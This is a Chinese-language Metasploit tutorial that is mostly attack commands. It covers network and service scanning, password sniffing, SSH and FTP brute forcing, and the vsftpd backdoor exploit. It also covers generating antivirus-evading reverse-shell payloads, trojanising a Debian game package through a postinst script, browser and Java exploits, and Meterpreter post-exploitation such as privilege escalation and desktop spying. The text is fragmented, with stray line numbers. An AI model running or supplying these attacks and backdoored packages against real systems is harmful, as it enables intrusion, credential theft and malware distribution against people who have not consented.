systemctl start postgresql msfconsole # 或者是 msfdb run
😸基于TCP协议收集主机信息
先试一下nnmap在msf中的使用
1
db_nmap -sV [IP地址] # 扫描一下··· ···
测试ARP扫描
1 2 3 4 5 6
serch arp_sweep # 搜索有关ARP扫描的相关模块 use auxiliary/scanner/discovery/arp_sweep show options # 查看配置信息 set RHOSTS [网段/IP地址] # 指定扫描 set THREADS [数量] # 并发进程数,调15就好了 run
使用半连接方式扫描TCP端口
1 2 3 4 5 6 7
search portscan # 搜索有关端口扫描的相关模块 use auxiliary/scanner/portscan/syn show options # 查看配置信息 set RHOSTS [IP地址] # 指定扫描 set PORTS [端口号或者是端口范围] # 指定端口扫描 set THREADS [数量] # 并发进程数,调15就好了 run
使用auxiliary /sniffer下的psnuffle模块进行密码嗅探
1 2 3 4 5
search psnuffle use auxiliary/sniffer/psnuffle info # 查看此嗅探模块的详细信息 show options # 查看配置信息 run
search snmp_enum use auxiliary/scanner/snmp/snmp_enum show options # 查看配置信息 set RHOSTS [IP地址] # 指定扫描 run
这个结果包含很多信息,真香
🐱基于SMB协议收集信息
先扫描SMB版本
1 2 3 4 5
search smb_version use auxiliary/scanner/smb/smb_version show options # 查看配置信息 set RHOSTS [IP地址] # 指定扫描 run
扫描SMB的共享文件夹(需要知道SMB的账号密码)
1 2 3 4 5 6 7
search smb_enumshares use auxiliary/scanner/smb/smb_enumshares show options # 查看配置信息 set RHOSTS [IP地址] # 指定扫描 set SMBUser [用户名] # 输入目标机的SMB账号 set SMBPass [密码] # 输入目标机的SMB密码 run
扫描系统的用户信息(SID枚举)
1 2 3 4 5 6 7
search smb_lookupsid use auxiliary/scanner/smb/smb_lookupsid show options # 查看配置信息 set RHOSTS [IP地址] # 指定扫描 set SMBUser [用户名] # 输入目标机的SMB账号 set SMBPass [密码] # 输入目标机的SMB密码 run
😾基于SSH协议收集信息
收集SSH版本信息
1 2 3 4 5
search ssh_version use auxiliary/scanner/ssh/ssh_version show options # 查看配置信息 set RHOSTS [IP地址] # 指定扫描 run
暴力破解SSH密码
1 2 3 4
search ssh_login use auxiliary/scanner/ssh/ssh_login show options # 查看配置信息 set RHOSTS [IP地址] # 指定扫描
然后要找到相应的暴破字典,这里的字典文件只供测试
1 2
cd /usr/share/metasploit-framework/data/wordlists # 下面的root_userpasswd.txt
设置到配置里面
1 2 3
set USERPASS_FILE /usr/share/metasploit-framework/data/wordlists/root_userpasswd.txt set VERBOSE true # 显示所有的测试过程 run
🙀基于FTP协议收集信息
收集FTP版本信息
1 2 3 4 5
search ftp_version use auxiliary/scanner/ftp/ftp_version show options # 查看配置信息 set RHOSTS [IP地址] # 指定扫描 run
关于FTP的这个版本搜索漏洞
1 2 3 4 5 6
search [FTP的版本号或者是vsftpd] use exploit/unix/ftp/vsftpd_234_backdoor show options # 查看配置信息 set RHOSTS [IP地址] # 指定扫描 show targets # 查看能被渗透的版本或应用 run
FTP的匿名登录
1 2 3 4 5
search name:anonymous # 搜索可匿名的服务 use auxiliary/scanner/ftp/anonymous show options # 查看配置信息 set RHOSTS [IP地址] # 指定扫描 run
FTP的暴力破解
1 2 3 4 5 6 7
search ftp_login use auxiliary/scanner/ftp/ftp_login show options # 查看配置信息 set RHOSTS [IP地址] # 指定扫描 set USERPASS_FILE /usr/share/metasploit-framework/data/wordlists/root_userpasswd.txt set VERBOSE true # 显示所有的测试过程 run
msfvenom [参数] # 这是一个工具 -a x86 # 指定架构 --platform windows # 指定运行程序的平台 -p windows/meterpreter/reverse_tcp # 指定攻击载荷,可以通过-l platforms命令可以查看所有支持的平台 LHOST=[IP地址] # 是你自己的一台想控制别人电脑的MSF主机上的IP地址 LPORT=[端口号] # 是你自己的一台想控制别人电脑的MSF主机的联络端口 -b "\x00" # 去掉坏字符,坏字符会影响程序的正常执行 -e X86/shikata_ga_nai # 指定编码器,防被杀毒软件 -i 10 # 编码的次数 | msfvenom -a x86 --platform windows -e x86/alpha_upper -i 10 # 第二次的编码器 -f exe # 指定生成的文件的格式 -o [地址] # 指定输出生成的程序文件的位置以及文件名
在自己的MSF主机上启动Handler开始监听程序内指定的后门程序
1 2 3 4 5 6 7
msfdb run# 进入监听框架 use exploit/multi/handler # 此监听模块 show options # 查看配置 set payload windows/meterpreter/reverse_tcp # 设置payload,也就是攻击载荷 set LHOST [MSF主机上的IP地址] set LPORT [MSF主机上的端口号] run# 开始执行监听
search evasion use evasion/windows/windows_defender_exe show options # 查看配置 set FILENAM [生成的文件名] setpayload windows/meterpreter/reverse_tcp# 设置payload,也就是攻击载荷 setLHOST [MSF主机上的IP地址] setLPORT [MSF主机上的端口号] run
在自己的MSF主机上启动Handler开始监听程序内指定的后门程序
1 2 3 4 5
use exploit/multi/handler set payload windows/meterpreter/reverse_tcp# 设置payload,也就是攻击载荷 setLHOST [MSF主机上的IP地址] setLPORT [MSF主机上的端口号] run # 启动监听
💀控制Windows的Shell后的操作命令
查看Windows当前获得的权限
1
getuid
从管理员用户提升到系统最高权限命令
1
getsystem
PS:在MSF里面,依然可以使用Linux命令来操作Windows
1 2 3 4 5 6
ls # 查看当前目录下的文件 getbid # 此木马程序的进程ID ps # 查看目标机所运行的所有进程 sysinfo# 查看系统信息 screenshot # 截图 run vnc # 实时监控目标机的桌面
cd [解压目录] # 进入软件包的根目录下 mkdir DEBIAN # 自己创建一个文件夹名 cd DEBIAN # 进入自己创建的目录 vim control # 编辑并创建一个配置文件 ==========================================配置信息============================================= Package: freesweep Version:1.0.1-1 Section: Games and Amusement Priority: optional Architecture: amd64 Maintainer: Ubuntu MOTu Developers (ubuntu-motu@lists.ubuntu.com) Description: a text-based minesweeper Freesweep is an implementation of the popular minesweeper game, where one tries to find all the mines without igniting any, based on hints givene-by the computer. Unlike most implementations of this game, Freesweepworks in any visual text display - in Linux console, in an xterm, and incmost text-based terminals currently in use. =============================================================================================== vim postinst # 编辑并创建一个配置文件 ==========================================配置信息============================================= #!/bin/bash sudo chmod 2755/usr/games/freesweep_sources sudo /usr/games/freesweep_sources & # 这两个是我们生成的木马文件的目录 =============================================================================================== chmod 755/var/cache/apt/archives/free/DEBIAN/postinst # 加上可执行权限
msfdb run use exploit/multi/handler set linux/x64/meterpreter/reverse_tcp # 设置payload,也就是攻击载荷 set LHOST [MSF主机上的IP地址] set LPORT [MSF主机上的端口号] run # 启动监听
msfdb run use exploit/multi/handler # 此监听模块 show options # 查看配置 set payload windows/meterpreter/reverse_tcp # 设置payload,也就是攻击载荷 set LHOST [MSF主机上的IP地址] set LPORT [MSF主机上的端口号] run # 开始执行监听
等待靶机用IE内核的浏览器打开我们刚刚生成的病毒网页
🐱👤六、利用JAVA环境漏洞获取Shell
⭕注:利用的此漏洞仅适用于特定版本的JAVA环境以及IE浏览器打开
1 2 3 4 5 6 7 8
msfdb run use exploit/multi/browser/java_jre17_driver_manager show options # 查看配置 show payload # 查看可使用的payload set payload java/meterpreter/reverse_tcp # 设置关于JAVA的payload LHOST=[IP地址] # 是你自己的一台想控制别人电脑的MSF主机上的IP地址 LPORT=[端口号] # 是你自己的一台想控制别人电脑的MSF主机的联络端口 exploit
msfdb run use exploit/multi/handler set payload windows/meterpreter/reverse_tcp # 设置payload,也就是攻击载荷 set LHOST [MSF主机上的IP地址] set LPORT [MSF主机上的端口号] run # 开始执行监听
msfdb run use exploit/multi/handler set android/meterpreter/reverse_tcp # 设置payload,也就是攻击载荷 set LHOST [MSF主机上的IP地址] set LPORT [MSF主机上的端口号] run # 开始执行监听
msfdb run use exploit/multi/handler set android/meterpreter/reverse_tcp # 设置payload,也就是攻击载荷 set LHOST [MSF主机上的IP地址] set LPORT [MSF主机上的端口号] run # 开始执行监听